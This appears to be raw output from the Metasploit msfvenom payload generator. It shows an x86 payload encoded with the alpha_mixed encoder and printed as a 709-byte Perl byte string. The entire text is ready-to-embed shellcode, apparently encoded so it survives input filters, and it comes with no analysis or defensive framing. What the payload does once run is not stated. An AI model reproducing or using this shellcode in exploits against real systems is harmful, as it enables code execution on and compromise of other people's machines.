Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 709 (iteration=0)
x86/alpha_mixed chosen with final size 709
Payload size: 709 bytes
Final size of perl file: 3101 bytes
my $buf = 
"\x89\xe5\xd9\xcf\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x49\x6c\x58\x68\x6b\x32\x77\x70\x45\x50\x37" .
"\x70\x53\x50\x4b\x39\x39\x75\x65\x61\x49\x50\x52\x44\x4e" .
"\x6b\x42\x70\x46\x50\x4c\x4b\x32\x72\x34\x4c\x6e\x6b\x70" .
"\x52\x75\x44\x6c\x4b\x62\x52\x37\x58\x74\x4f\x68\x37\x43" .
"\x7a\x54\x66\x35\x61\x6b\x4f\x4e\x4c\x35\x6c\x50\x61\x53" .
"\x4c\x65\x52\x36\x4c\x55\x70\x6b\x71\x48\x4f\x46\x6d\x73" .
"\x31\x4a\x67\x6a\x42\x7a\x52\x42\x72\x53\x67\x4e\x6b\x72" .
"\x72\x54\x50\x4c\x4b\x33\x7a\x47\x4c\x4c\x4b\x42\x6c\x54" .
"\x51\x43\x48\x5a\x43\x63\x78\x46\x61\x58\x51\x76\x31\x6c" .
"\x4b\x32\x79\x65\x70\x75\x51\x6a\x73\x6c\x4b\x42\x69\x67" .
"\x68\x5a\x43\x44\x7a\x37\x39\x4e\x6b\x30\x34\x4c\x4b\x67" .
"\x71\x5a\x76\x55\x61\x59\x6f\x4e\x4c\x4a\x61\x4a\x6f\x34" .
"\x4d\x76\x61\x58\x47\x46\x58\x4b\x50\x52\x55\x4c\x36\x43" .
"\x33\x31\x6d\x48\x78\x75\x6b\x63\x4d\x57\x54\x51\x65\x39" .
"\x74\x43\x68\x4e\x6b\x63\x68\x31\x34\x47\x71\x59\x43\x72" .
"\x46\x6c\x4b\x46\x6c\x70\x4b\x4c\x4b\x61\x48\x45\x4c\x43" .
"\x31\x4a\x73\x4e\x6b\x54\x44\x4c\x4b\x53\x31\x58\x50\x6b" .
"\x39\x67\x34\x57\x54\x66\x44\x43\x6b\x51\x4b\x61\x71\x56" .
"\x39\x53\x6a\x30\x51\x59\x6f\x6d\x30\x61\x4f\x43\x6f\x63" .
"\x6a\x4c\x4b\x62\x32\x68\x6b\x4e\x6d\x71\x4d\x35\x38\x70" .
"\x33\x70\x32\x77\x70\x77\x70\x35\x38\x42\x57\x63\x43\x74" .
"\x72\x33\x6f\x33\x64\x42\x48\x62\x6c\x32\x57\x35\x76\x56" .
"\x67\x6b\x4f\x38\x55\x58\x38\x5a\x30\x53\x31\x53\x30\x37" .
"\x70\x64\x69\x48\x44\x32\x74\x56\x30\x73\x58\x34\x69\x4f" .
"\x70\x62\x4b\x73\x30\x39\x6f\x4a\x75\x32\x70\x36\x30\x46" .
"\x30\x70\x50\x47\x30\x72\x70\x43\x70\x70\x50\x45\x38\x7a" .
"\x4a\x46\x6f\x79\x4f\x6b\x50\x6b\x4f\x78\x55\x5a\x37\x33" .
"\x5a\x66\x65\x62\x48\x49\x50\x4f\x58\x61\x6e\x4b\x31\x31" .
"\x78\x74\x42\x53\x30\x77\x6f\x7a\x30\x4c\x49\x6d\x36\x62" .
"\x4a\x46\x70\x30\x56\x71\x47\x31\x78\x6a\x39\x4f\x55\x61" .
"\x64\x75\x31\x4b\x4f\x5a\x75\x4c\x45\x49\x50\x53\x44\x76" .
"\x6c\x4b\x4f\x70\x4e\x44\x48\x32\x55\x68\x6c\x62\x48\x4a" .
"\x50\x6d\x65\x4f\x52\x51\x46\x79\x6f\x78\x55\x73\x58\x70" .
"\x63\x62\x4d\x52\x44\x37\x70\x4f\x79\x6d\x33\x36\x37\x76" .
"\x37\x53\x67\x30\x31\x79\x66\x32\x4a\x66\x72\x70\x59\x72" .
"\x76\x58\x62\x59\x6d\x50\x66\x38\x47\x32\x64\x46\x44\x47" .
"\x4c\x63\x31\x65\x51\x6c\x4d\x37\x34\x54\x64\x66\x70\x59" .
"\x56\x63\x30\x77\x34\x36\x34\x56\x30\x53\x66\x36\x36\x76" .
"\x36\x30\x46\x46\x36\x70\x4e\x62\x76\x36\x36\x31\x43\x52" .
"\x76\x65\x38\x52\x59\x38\x4c\x75\x6f\x4b\x36\x79\x6f\x6b" .
"\x65\x6f\x79\x79\x70\x30\x4e\x36\x36\x71\x56\x39\x6f\x70" .
"\x30\x55\x38\x33\x38\x6f\x77\x75\x4d\x53\x50\x39\x6f\x68" .
"\x55\x6d\x6b\x58\x70\x4d\x65\x6d\x72\x56\x36\x35\x38\x4e" .
"\x46\x6c\x55\x4d\x6d\x6d\x4d\x6b\x4f\x49\x45\x65\x6c\x74" .
"\x46\x51\x6c\x54\x4a\x6f\x70\x59\x6b\x6b\x50\x33\x45\x34" .
"\x45\x4d\x6b\x50\x47\x72\x33\x63\x42\x50\x6f\x70\x6a\x65" .
"\x50\x32\x73\x59\x6f\x78\x55\x41\x41";